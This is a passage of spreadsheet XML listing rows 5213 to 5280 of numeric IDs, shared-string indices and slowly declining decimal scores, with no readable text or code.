        <v>1.9086469E7</v>
      </c>
      <c r="C5213" s="2" t="s">
        <v>4989</v>
      </c>
      <c r="D5213" s="2">
        <v>1.0</v>
      </c>
      <c r="E5213" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5213" s="2">
        <v>0.1838810641627543</v>
      </c>
    </row>
    <row r="5214" ht="15.75" customHeight="1">
      <c r="A5214" s="1">
        <v>21175.0</v>
      </c>
      <c r="B5214" s="2">
        <v>1.9145414E7</v>
      </c>
      <c r="C5214" s="2" t="s">
        <v>4990</v>
      </c>
      <c r="D5214" s="2">
        <v>1.0</v>
      </c>
      <c r="E5214" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5214" s="2">
        <v>0.1830601092896176</v>
      </c>
    </row>
    <row r="5215" ht="15.75" customHeight="1">
      <c r="A5215" s="1">
        <v>21682.0</v>
      </c>
      <c r="B5215" s="2">
        <v>2.5057159E7</v>
      </c>
      <c r="C5215" s="2" t="s">
        <v>4991</v>
      </c>
      <c r="D5215" s="2">
        <v>1.0</v>
      </c>
      <c r="E5215" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5215" s="2">
        <v>0.1830601092896176</v>
      </c>
    </row>
    <row r="5216" ht="15.75" customHeight="1">
      <c r="A5216" s="1">
        <v>32802.0</v>
      </c>
      <c r="B5216" s="2">
        <v>6162036.0</v>
      </c>
      <c r="C5216" s="2" t="s">
        <v>4992</v>
      </c>
      <c r="D5216" s="2">
        <v>1.0</v>
      </c>
      <c r="E5216" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5216" s="2">
        <v>0.1826599326599327</v>
      </c>
    </row>
    <row r="5217" ht="15.75" customHeight="1">
      <c r="A5217" s="1">
        <v>29903.0</v>
      </c>
      <c r="B5217" s="2">
        <v>3607047.0</v>
      </c>
      <c r="C5217" s="2" t="s">
        <v>4993</v>
      </c>
      <c r="D5217" s="2">
        <v>1.0</v>
      </c>
      <c r="E5217" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5217" s="2">
        <v>0.1826388888888889</v>
      </c>
    </row>
    <row r="5218" ht="15.75" customHeight="1">
      <c r="A5218" s="1">
        <v>27273.0</v>
      </c>
      <c r="B5218" s="2">
        <v>2.1229056E7</v>
      </c>
      <c r="C5218" s="2" t="s">
        <v>4986</v>
      </c>
      <c r="D5218" s="2">
        <v>1.0</v>
      </c>
      <c r="E5218" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5218" s="2">
        <v>0.1822612085769981</v>
      </c>
    </row>
    <row r="5219" ht="15.75" customHeight="1">
      <c r="A5219" s="1">
        <v>20685.0</v>
      </c>
      <c r="B5219" s="2">
        <v>1.44676E7</v>
      </c>
      <c r="C5219" s="2" t="s">
        <v>4994</v>
      </c>
      <c r="D5219" s="2">
        <v>1.0</v>
      </c>
      <c r="E5219" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5219" s="2">
        <v>0.1821895424836602</v>
      </c>
    </row>
    <row r="5220" ht="15.75" customHeight="1">
      <c r="A5220" s="1">
        <v>32267.0</v>
      </c>
      <c r="B5220" s="2">
        <v>5521390.0</v>
      </c>
      <c r="C5220" s="2" t="s">
        <v>4995</v>
      </c>
      <c r="D5220" s="2">
        <v>1.0</v>
      </c>
      <c r="E5220" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5220" s="2">
        <v>0.1817325800376648</v>
      </c>
    </row>
    <row r="5221" ht="15.75" customHeight="1">
      <c r="A5221" s="1">
        <v>16217.0</v>
      </c>
      <c r="B5221" s="2">
        <v>4.570714E7</v>
      </c>
      <c r="C5221" s="2" t="s">
        <v>4996</v>
      </c>
      <c r="D5221" s="2">
        <v>1.0</v>
      </c>
      <c r="E5221" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5221" s="2">
        <v>0.181592039800995</v>
      </c>
    </row>
    <row r="5222" ht="15.75" customHeight="1">
      <c r="A5222" s="1">
        <v>27089.0</v>
      </c>
      <c r="B5222" s="2">
        <v>2.0502173E7</v>
      </c>
      <c r="C5222" s="2" t="s">
        <v>4997</v>
      </c>
      <c r="D5222" s="2">
        <v>1.0</v>
      </c>
      <c r="E5222" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5222" s="2">
        <v>0.1814420803782505</v>
      </c>
    </row>
    <row r="5223" ht="15.75" customHeight="1">
      <c r="A5223" s="1">
        <v>33755.0</v>
      </c>
      <c r="B5223" s="2">
        <v>8603833.0</v>
      </c>
      <c r="C5223" s="2" t="s">
        <v>4998</v>
      </c>
      <c r="D5223" s="2">
        <v>1.0</v>
      </c>
      <c r="E5223" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5223" s="2">
        <v>0.1814236111111112</v>
      </c>
    </row>
    <row r="5224" ht="15.75" customHeight="1">
      <c r="A5224" s="1">
        <v>29577.0</v>
      </c>
      <c r="B5224" s="2">
        <v>3.3414656E7</v>
      </c>
      <c r="C5224" s="2" t="s">
        <v>4999</v>
      </c>
      <c r="D5224" s="2">
        <v>1.0</v>
      </c>
      <c r="E5224" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5224" s="2">
        <v>0.1814236111111111</v>
      </c>
    </row>
    <row r="5225" ht="15.75" customHeight="1">
      <c r="A5225" s="1">
        <v>28829.0</v>
      </c>
      <c r="B5225" s="2">
        <v>2.885126E7</v>
      </c>
      <c r="C5225" s="2" t="s">
        <v>5000</v>
      </c>
      <c r="D5225" s="2">
        <v>1.0</v>
      </c>
      <c r="E5225" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5225" s="2">
        <v>0.1813922356091031</v>
      </c>
    </row>
    <row r="5226" ht="15.75" customHeight="1">
      <c r="A5226" s="1">
        <v>29545.0</v>
      </c>
      <c r="B5226" s="2">
        <v>3.2991604E7</v>
      </c>
      <c r="C5226" s="2" t="s">
        <v>5001</v>
      </c>
      <c r="D5226" s="2">
        <v>1.0</v>
      </c>
      <c r="E5226" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5226" s="2">
        <v>0.1813271604938272</v>
      </c>
    </row>
    <row r="5227" ht="15.75" customHeight="1">
      <c r="A5227" s="1">
        <v>29846.0</v>
      </c>
      <c r="B5227" s="2">
        <v>3.5696966E7</v>
      </c>
      <c r="C5227" s="2" t="s">
        <v>5002</v>
      </c>
      <c r="D5227" s="2">
        <v>1.0</v>
      </c>
      <c r="E5227" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5227" s="2">
        <v>0.1813271604938272</v>
      </c>
    </row>
    <row r="5228" ht="15.75" customHeight="1">
      <c r="A5228" s="1">
        <v>30900.0</v>
      </c>
      <c r="B5228" s="2">
        <v>4.6683657E7</v>
      </c>
      <c r="C5228" s="2" t="s">
        <v>5003</v>
      </c>
      <c r="D5228" s="2">
        <v>1.0</v>
      </c>
      <c r="E5228" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5228" s="2">
        <v>0.1813131313131313</v>
      </c>
    </row>
    <row r="5229" ht="15.75" customHeight="1">
      <c r="A5229" s="1">
        <v>22141.0</v>
      </c>
      <c r="B5229" s="2">
        <v>3.115119E7</v>
      </c>
      <c r="C5229" s="2" t="s">
        <v>5004</v>
      </c>
      <c r="D5229" s="2">
        <v>1.0</v>
      </c>
      <c r="E5229" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5229" s="2">
        <v>0.1812386156648452</v>
      </c>
    </row>
    <row r="5230" ht="15.75" customHeight="1">
      <c r="A5230" s="1">
        <v>25178.0</v>
      </c>
      <c r="B5230" s="2">
        <v>1.312275E7</v>
      </c>
      <c r="C5230" s="2" t="s">
        <v>5005</v>
      </c>
      <c r="D5230" s="2">
        <v>1.0</v>
      </c>
      <c r="E5230" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5230" s="2">
        <v>0.1812386156648452</v>
      </c>
    </row>
    <row r="5231" ht="15.75" customHeight="1">
      <c r="A5231" s="1">
        <v>26509.0</v>
      </c>
      <c r="B5231" s="2">
        <v>1.7604699E7</v>
      </c>
      <c r="C5231" s="2" t="s">
        <v>4991</v>
      </c>
      <c r="D5231" s="2">
        <v>1.0</v>
      </c>
      <c r="E5231" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5231" s="2">
        <v>0.1812386156648452</v>
      </c>
    </row>
    <row r="5232" ht="15.75" customHeight="1">
      <c r="A5232" s="1">
        <v>26876.0</v>
      </c>
      <c r="B5232" s="2">
        <v>1.9145413E7</v>
      </c>
      <c r="C5232" s="2" t="s">
        <v>4990</v>
      </c>
      <c r="D5232" s="2">
        <v>1.0</v>
      </c>
      <c r="E5232" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5232" s="2">
        <v>0.1812386156648452</v>
      </c>
    </row>
    <row r="5233" ht="15.75" customHeight="1">
      <c r="A5233" s="1">
        <v>29859.0</v>
      </c>
      <c r="B5233" s="2">
        <v>3.5791729E7</v>
      </c>
      <c r="C5233" s="2" t="s">
        <v>5006</v>
      </c>
      <c r="D5233" s="2">
        <v>1.0</v>
      </c>
      <c r="E5233" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5233" s="2">
        <v>0.1812386156648452</v>
      </c>
    </row>
    <row r="5234" ht="15.75" customHeight="1">
      <c r="A5234" s="1">
        <v>21029.0</v>
      </c>
      <c r="B5234" s="2">
        <v>1.7514733E7</v>
      </c>
      <c r="C5234" s="2" t="s">
        <v>5007</v>
      </c>
      <c r="D5234" s="2">
        <v>1.0</v>
      </c>
      <c r="E5234" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5234" s="2">
        <v>0.1805555555555556</v>
      </c>
    </row>
    <row r="5235" ht="15.75" customHeight="1">
      <c r="A5235" s="1">
        <v>25632.0</v>
      </c>
      <c r="B5235" s="2">
        <v>1.4467599E7</v>
      </c>
      <c r="C5235" s="2" t="s">
        <v>4994</v>
      </c>
      <c r="D5235" s="2">
        <v>1.0</v>
      </c>
      <c r="E5235" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5235" s="2">
        <v>0.1805555555555556</v>
      </c>
    </row>
    <row r="5236" ht="15.75" customHeight="1">
      <c r="A5236" s="1">
        <v>29721.0</v>
      </c>
      <c r="B5236" s="2">
        <v>3.4484666E7</v>
      </c>
      <c r="C5236" s="2" t="s">
        <v>5008</v>
      </c>
      <c r="D5236" s="2">
        <v>1.0</v>
      </c>
      <c r="E5236" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5236" s="2">
        <v>0.1805555555555556</v>
      </c>
    </row>
    <row r="5237" ht="15.75" customHeight="1">
      <c r="A5237" s="1">
        <v>33807.0</v>
      </c>
      <c r="B5237" s="2">
        <v>8840416.0</v>
      </c>
      <c r="C5237" s="2" t="s">
        <v>4984</v>
      </c>
      <c r="D5237" s="2">
        <v>1.0</v>
      </c>
      <c r="E5237" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5237" s="2">
        <v>0.1805555555555556</v>
      </c>
    </row>
    <row r="5238" ht="15.75" customHeight="1">
      <c r="A5238" s="1">
        <v>23025.0</v>
      </c>
      <c r="B5238" s="2">
        <v>4998266.0</v>
      </c>
      <c r="C5238" s="2" t="s">
        <v>5009</v>
      </c>
      <c r="D5238" s="2">
        <v>1.0</v>
      </c>
      <c r="E5238" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5238" s="2">
        <v>0.180365296803653</v>
      </c>
    </row>
    <row r="5239" ht="15.75" customHeight="1">
      <c r="A5239" s="1">
        <v>32862.0</v>
      </c>
      <c r="B5239" s="2">
        <v>6282255.0</v>
      </c>
      <c r="C5239" s="2" t="s">
        <v>5010</v>
      </c>
      <c r="D5239" s="2">
        <v>1.0</v>
      </c>
      <c r="E5239" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5239" s="2">
        <v>0.1801994301994302</v>
      </c>
    </row>
    <row r="5240" ht="15.75" customHeight="1">
      <c r="A5240" s="1">
        <v>30935.0</v>
      </c>
      <c r="B5240" s="2">
        <v>4.7205659E7</v>
      </c>
      <c r="C5240" s="2" t="s">
        <v>5011</v>
      </c>
      <c r="D5240" s="2">
        <v>1.0</v>
      </c>
      <c r="E5240" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5240" s="2">
        <v>0.1801075268817205</v>
      </c>
    </row>
    <row r="5241" ht="15.75" customHeight="1">
      <c r="A5241" s="1">
        <v>33200.0</v>
      </c>
      <c r="B5241" s="2">
        <v>7165334.0</v>
      </c>
      <c r="C5241" s="2" t="s">
        <v>5012</v>
      </c>
      <c r="D5241" s="2">
        <v>1.0</v>
      </c>
      <c r="E5241" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5241" s="2">
        <v>0.1801075268817205</v>
      </c>
    </row>
    <row r="5242" ht="15.75" customHeight="1">
      <c r="A5242" s="1">
        <v>27747.0</v>
      </c>
      <c r="B5242" s="2">
        <v>2.3082886E7</v>
      </c>
      <c r="C5242" s="2" t="s">
        <v>5013</v>
      </c>
      <c r="D5242" s="2">
        <v>1.0</v>
      </c>
      <c r="E5242" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5242" s="2">
        <v>0.1799336650082919</v>
      </c>
    </row>
    <row r="5243" ht="15.75" customHeight="1">
      <c r="A5243" s="1">
        <v>32268.0</v>
      </c>
      <c r="B5243" s="2">
        <v>5521406.0</v>
      </c>
      <c r="C5243" s="2" t="s">
        <v>4995</v>
      </c>
      <c r="D5243" s="2">
        <v>1.0</v>
      </c>
      <c r="E5243" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5243" s="2">
        <v>0.17984934086629</v>
      </c>
    </row>
    <row r="5244" ht="15.75" customHeight="1">
      <c r="A5244" s="1">
        <v>30198.0</v>
      </c>
      <c r="B5244" s="2">
        <v>3.7275132E7</v>
      </c>
      <c r="C5244" s="2" t="s">
        <v>5014</v>
      </c>
      <c r="D5244" s="2">
        <v>1.0</v>
      </c>
      <c r="E5244" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5244" s="2">
        <v>0.1796296296296296</v>
      </c>
    </row>
    <row r="5245" ht="15.75" customHeight="1">
      <c r="A5245" s="1">
        <v>28221.0</v>
      </c>
      <c r="B5245" s="2">
        <v>2.5057158E7</v>
      </c>
      <c r="C5245" s="2" t="s">
        <v>4991</v>
      </c>
      <c r="D5245" s="2">
        <v>1.0</v>
      </c>
      <c r="E5245" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5245" s="2">
        <v>0.1794171220400729</v>
      </c>
    </row>
    <row r="5246" ht="15.75" customHeight="1">
      <c r="A5246" s="1">
        <v>21471.0</v>
      </c>
      <c r="B5246" s="2">
        <v>2.2928155E7</v>
      </c>
      <c r="C5246" s="2" t="s">
        <v>5015</v>
      </c>
      <c r="D5246" s="2">
        <v>1.0</v>
      </c>
      <c r="E5246" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5246" s="2">
        <v>0.1792929292929293</v>
      </c>
    </row>
    <row r="5247" ht="15.75" customHeight="1">
      <c r="A5247" s="1">
        <v>32269.0</v>
      </c>
      <c r="B5247" s="2">
        <v>5.5221403E7</v>
      </c>
      <c r="C5247" s="2" t="s">
        <v>5016</v>
      </c>
      <c r="D5247" s="2">
        <v>1.0</v>
      </c>
      <c r="E5247" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5247" s="2">
        <v>0.1787037037037037</v>
      </c>
    </row>
    <row r="5248" ht="15.75" customHeight="1">
      <c r="A5248" s="1">
        <v>23565.0</v>
      </c>
      <c r="B5248" s="2">
        <v>6160882.0</v>
      </c>
      <c r="C5248" s="2" t="s">
        <v>5017</v>
      </c>
      <c r="D5248" s="2">
        <v>1.0</v>
      </c>
      <c r="E5248" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5248" s="2">
        <v>0.1785714285714286</v>
      </c>
    </row>
    <row r="5249" ht="15.75" customHeight="1">
      <c r="A5249" s="1">
        <v>26089.0</v>
      </c>
      <c r="B5249" s="2">
        <v>1.5658646E7</v>
      </c>
      <c r="C5249" s="2" t="s">
        <v>5018</v>
      </c>
      <c r="D5249" s="2">
        <v>1.0</v>
      </c>
      <c r="E5249" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5249" s="2">
        <v>0.1783625730994153</v>
      </c>
    </row>
    <row r="5250" ht="15.75" customHeight="1">
      <c r="A5250" s="1">
        <v>32254.0</v>
      </c>
      <c r="B5250" s="2">
        <v>5.5086566E7</v>
      </c>
      <c r="C5250" s="2" t="s">
        <v>5019</v>
      </c>
      <c r="D5250" s="2">
        <v>1.0</v>
      </c>
      <c r="E5250" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5250" s="2">
        <v>0.17831541218638</v>
      </c>
    </row>
    <row r="5251" ht="15.75" customHeight="1">
      <c r="A5251" s="1">
        <v>33571.0</v>
      </c>
      <c r="B5251" s="2">
        <v>8232150.0</v>
      </c>
      <c r="C5251" s="2" t="s">
        <v>5020</v>
      </c>
      <c r="D5251" s="2">
        <v>1.0</v>
      </c>
      <c r="E5251" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5251" s="2">
        <v>0.177927927927928</v>
      </c>
    </row>
    <row r="5252" ht="15.75" customHeight="1">
      <c r="A5252" s="1">
        <v>25179.0</v>
      </c>
      <c r="B5252" s="2">
        <v>1.312275E7</v>
      </c>
      <c r="C5252" s="2" t="s">
        <v>5021</v>
      </c>
      <c r="D5252" s="2">
        <v>1.0</v>
      </c>
      <c r="E5252" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5252" s="2">
        <v>0.1772486772486773</v>
      </c>
    </row>
    <row r="5253" ht="15.75" customHeight="1">
      <c r="A5253" s="1">
        <v>25503.0</v>
      </c>
      <c r="B5253" s="2">
        <v>1.4138403E7</v>
      </c>
      <c r="C5253" s="2" t="s">
        <v>5022</v>
      </c>
      <c r="D5253" s="2">
        <v>1.0</v>
      </c>
      <c r="E5253" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5253" s="2">
        <v>0.1772486772486773</v>
      </c>
    </row>
    <row r="5254" ht="15.75" customHeight="1">
      <c r="A5254" s="1">
        <v>25756.0</v>
      </c>
      <c r="B5254" s="2">
        <v>1.4603991E7</v>
      </c>
      <c r="C5254" s="2" t="s">
        <v>5023</v>
      </c>
      <c r="D5254" s="2">
        <v>1.0</v>
      </c>
      <c r="E5254" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5254" s="2">
        <v>0.176984126984127</v>
      </c>
    </row>
    <row r="5255" ht="15.75" customHeight="1">
      <c r="A5255" s="1">
        <v>24229.0</v>
      </c>
      <c r="B5255" s="2">
        <v>1.0454215E7</v>
      </c>
      <c r="C5255" s="2" t="s">
        <v>5024</v>
      </c>
      <c r="D5255" s="2">
        <v>1.0</v>
      </c>
      <c r="E5255" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5255" s="2">
        <v>0.1769323671497585</v>
      </c>
    </row>
    <row r="5256" ht="15.75" customHeight="1">
      <c r="A5256" s="1">
        <v>25594.0</v>
      </c>
      <c r="B5256" s="2">
        <v>1.437715E7</v>
      </c>
      <c r="C5256" s="2" t="s">
        <v>5025</v>
      </c>
      <c r="D5256" s="2">
        <v>1.0</v>
      </c>
      <c r="E5256" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5256" s="2">
        <v>0.1767676767676768</v>
      </c>
    </row>
    <row r="5257" ht="15.75" customHeight="1">
      <c r="A5257" s="1">
        <v>27420.0</v>
      </c>
      <c r="B5257" s="2">
        <v>2.1850016E7</v>
      </c>
      <c r="C5257" s="2" t="s">
        <v>5026</v>
      </c>
      <c r="D5257" s="2">
        <v>1.0</v>
      </c>
      <c r="E5257" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5257" s="2">
        <v>0.1767676767676768</v>
      </c>
    </row>
    <row r="5258" ht="15.75" customHeight="1">
      <c r="A5258" s="1">
        <v>26018.0</v>
      </c>
      <c r="B5258" s="2">
        <v>1.5372554E7</v>
      </c>
      <c r="C5258" s="2" t="s">
        <v>5027</v>
      </c>
      <c r="D5258" s="2">
        <v>1.0</v>
      </c>
      <c r="E5258" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5258" s="2">
        <v>0.1764346764346764</v>
      </c>
    </row>
    <row r="5259" ht="15.75" customHeight="1">
      <c r="A5259" s="1">
        <v>27279.0</v>
      </c>
      <c r="B5259" s="2">
        <v>2.1229056E7</v>
      </c>
      <c r="C5259" s="2" t="s">
        <v>5028</v>
      </c>
      <c r="D5259" s="2">
        <v>1.0</v>
      </c>
      <c r="E5259" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5259" s="2">
        <v>0.1761904761904762</v>
      </c>
    </row>
    <row r="5260" ht="15.75" customHeight="1">
      <c r="A5260" s="1">
        <v>27732.0</v>
      </c>
      <c r="B5260" s="2">
        <v>2.3080145E7</v>
      </c>
      <c r="C5260" s="2" t="s">
        <v>5029</v>
      </c>
      <c r="D5260" s="2">
        <v>1.0</v>
      </c>
      <c r="E5260" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5260" s="2">
        <v>0.1757741347905283</v>
      </c>
    </row>
    <row r="5261" ht="15.75" customHeight="1">
      <c r="A5261" s="1">
        <v>26014.0</v>
      </c>
      <c r="B5261" s="2">
        <v>1.5358594E7</v>
      </c>
      <c r="C5261" s="2" t="s">
        <v>5030</v>
      </c>
      <c r="D5261" s="2">
        <v>1.0</v>
      </c>
      <c r="E5261" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5261" s="2">
        <v>0.1752873563218391</v>
      </c>
    </row>
    <row r="5262" ht="15.75" customHeight="1">
      <c r="A5262" s="1">
        <v>27555.0</v>
      </c>
      <c r="B5262" s="2">
        <v>2.2396943E7</v>
      </c>
      <c r="C5262" s="2" t="s">
        <v>5031</v>
      </c>
      <c r="D5262" s="2">
        <v>1.0</v>
      </c>
      <c r="E5262" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5262" s="2">
        <v>0.1752873563218391</v>
      </c>
    </row>
    <row r="5263" ht="15.75" customHeight="1">
      <c r="A5263" s="1">
        <v>29736.0</v>
      </c>
      <c r="B5263" s="2">
        <v>3.4573384E7</v>
      </c>
      <c r="C5263" s="2" t="s">
        <v>5032</v>
      </c>
      <c r="D5263" s="2">
        <v>1.0</v>
      </c>
      <c r="E5263" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5263" s="2">
        <v>0.1752873563218391</v>
      </c>
    </row>
    <row r="5264" ht="15.75" customHeight="1">
      <c r="A5264" s="1">
        <v>29856.0</v>
      </c>
      <c r="B5264" s="2">
        <v>3.5770741E7</v>
      </c>
      <c r="C5264" s="2" t="s">
        <v>5033</v>
      </c>
      <c r="D5264" s="2">
        <v>1.0</v>
      </c>
      <c r="E5264" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5264" s="2">
        <v>0.1752873563218391</v>
      </c>
    </row>
    <row r="5265" ht="15.75" customHeight="1">
      <c r="A5265" s="1">
        <v>30545.0</v>
      </c>
      <c r="B5265" s="2">
        <v>4.0612578E7</v>
      </c>
      <c r="C5265" s="2" t="s">
        <v>5032</v>
      </c>
      <c r="D5265" s="2">
        <v>1.0</v>
      </c>
      <c r="E5265" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5265" s="2">
        <v>0.1752873563218391</v>
      </c>
    </row>
    <row r="5266" ht="15.75" customHeight="1">
      <c r="A5266" s="1">
        <v>26471.0</v>
      </c>
      <c r="B5266" s="2">
        <v>1.7387446E7</v>
      </c>
      <c r="C5266" s="2" t="s">
        <v>5034</v>
      </c>
      <c r="D5266" s="2">
        <v>1.0</v>
      </c>
      <c r="E5266" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5266" s="2">
        <v>0.1752136752136753</v>
      </c>
    </row>
    <row r="5267" ht="15.75" customHeight="1">
      <c r="A5267" s="1">
        <v>30134.0</v>
      </c>
      <c r="B5267" s="2">
        <v>3702194.0</v>
      </c>
      <c r="C5267" s="2" t="s">
        <v>5035</v>
      </c>
      <c r="D5267" s="2">
        <v>1.0</v>
      </c>
      <c r="E5267" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5267" s="2">
        <v>0.1749585406301825</v>
      </c>
    </row>
    <row r="5268" ht="15.75" customHeight="1">
      <c r="A5268" s="1">
        <v>27437.0</v>
      </c>
      <c r="B5268" s="2">
        <v>2.1938484E7</v>
      </c>
      <c r="C5268" s="2" t="s">
        <v>5036</v>
      </c>
      <c r="D5268" s="2">
        <v>1.0</v>
      </c>
      <c r="E5268" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5268" s="2">
        <v>0.1745014245014245</v>
      </c>
    </row>
    <row r="5269" ht="15.75" customHeight="1">
      <c r="A5269" s="1">
        <v>29894.0</v>
      </c>
      <c r="B5269" s="2">
        <v>3607014.0</v>
      </c>
      <c r="C5269" s="2" t="s">
        <v>5037</v>
      </c>
      <c r="D5269" s="2">
        <v>1.0</v>
      </c>
      <c r="E5269" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5269" s="2">
        <v>0.1744791666666667</v>
      </c>
    </row>
    <row r="5270" ht="15.75" customHeight="1">
      <c r="A5270" s="1">
        <v>32688.0</v>
      </c>
      <c r="B5270" s="2">
        <v>5953420.0</v>
      </c>
      <c r="C5270" s="2" t="s">
        <v>5038</v>
      </c>
      <c r="D5270" s="2">
        <v>1.0</v>
      </c>
      <c r="E5270" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5270" s="2">
        <v>0.1744791666666667</v>
      </c>
    </row>
    <row r="5271" ht="15.75" customHeight="1">
      <c r="A5271" s="1">
        <v>20833.0</v>
      </c>
      <c r="B5271" s="2">
        <v>1.5513515E7</v>
      </c>
      <c r="C5271" s="2" t="s">
        <v>5039</v>
      </c>
      <c r="D5271" s="2">
        <v>1.0</v>
      </c>
      <c r="E5271" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5271" s="2">
        <v>0.1744639376218324</v>
      </c>
    </row>
    <row r="5272" ht="15.75" customHeight="1">
      <c r="A5272" s="1">
        <v>24972.0</v>
      </c>
      <c r="B5272" s="2">
        <v>1.266346E7</v>
      </c>
      <c r="C5272" s="2" t="s">
        <v>5040</v>
      </c>
      <c r="D5272" s="2">
        <v>1.0</v>
      </c>
      <c r="E5272" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5272" s="2">
        <v>0.1742770167427702</v>
      </c>
    </row>
    <row r="5273" ht="15.75" customHeight="1">
      <c r="A5273" s="1">
        <v>27118.0</v>
      </c>
      <c r="B5273" s="2">
        <v>2.0660226E7</v>
      </c>
      <c r="C5273" s="2" t="s">
        <v>5041</v>
      </c>
      <c r="D5273" s="2">
        <v>1.0</v>
      </c>
      <c r="E5273" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5273" s="2">
        <v>0.1740196078431373</v>
      </c>
    </row>
    <row r="5274" ht="15.75" customHeight="1">
      <c r="A5274" s="1">
        <v>22983.0</v>
      </c>
      <c r="B5274" s="2">
        <v>4.9310435E7</v>
      </c>
      <c r="C5274" s="2" t="s">
        <v>5042</v>
      </c>
      <c r="D5274" s="2">
        <v>1.0</v>
      </c>
      <c r="E5274" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5274" s="2">
        <v>0.173952641165756</v>
      </c>
    </row>
    <row r="5275" ht="15.75" customHeight="1">
      <c r="A5275" s="1">
        <v>26766.0</v>
      </c>
      <c r="B5275" s="2">
        <v>1.8468601E7</v>
      </c>
      <c r="C5275" s="2" t="s">
        <v>5043</v>
      </c>
      <c r="D5275" s="2">
        <v>1.0</v>
      </c>
      <c r="E5275" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5275" s="2">
        <v>0.1737726098191215</v>
      </c>
    </row>
    <row r="5276" ht="15.75" customHeight="1">
      <c r="A5276" s="1">
        <v>28754.0</v>
      </c>
      <c r="B5276" s="2">
        <v>2.8124754E7</v>
      </c>
      <c r="C5276" s="2" t="s">
        <v>5044</v>
      </c>
      <c r="D5276" s="2">
        <v>1.0</v>
      </c>
      <c r="E5276" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5276" s="2">
        <v>0.1734234234234235</v>
      </c>
    </row>
    <row r="5277" ht="15.75" customHeight="1">
      <c r="A5277" s="1">
        <v>21044.0</v>
      </c>
      <c r="B5277" s="2">
        <v>1.7688636E7</v>
      </c>
      <c r="C5277" s="2" t="s">
        <v>5045</v>
      </c>
      <c r="D5277" s="2">
        <v>1.0</v>
      </c>
      <c r="E5277" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5277" s="2">
        <v>0.1733716475095786</v>
      </c>
    </row>
    <row r="5278" ht="15.75" customHeight="1">
      <c r="A5278" s="1">
        <v>21854.0</v>
      </c>
      <c r="B5278" s="2">
        <v>2.7182578E7</v>
      </c>
      <c r="C5278" s="2" t="s">
        <v>5046</v>
      </c>
      <c r="D5278" s="2">
        <v>1.0</v>
      </c>
      <c r="E5278" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5278" s="2">
        <v>0.1733716475095786</v>
      </c>
    </row>
    <row r="5279" ht="15.75" customHeight="1">
      <c r="A5279" s="1">
        <v>24822.0</v>
      </c>
      <c r="B5279" s="2">
        <v>1.2094967E7</v>
      </c>
      <c r="C5279" s="2" t="s">
        <v>5047</v>
      </c>
      <c r="D5279" s="2">
        <v>1.0</v>
      </c>
      <c r="E5279" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5279" s="2">
        <v>0.1733716475095786</v>
      </c>
    </row>
    <row r="5280" ht="15.75" customHeight="1">
      <c r="A5280" s="1">
        <v>26525.0</v>
      </c>
      <c r="B5280" s="2">
        <v>1.7688635E7</v>
      </c>
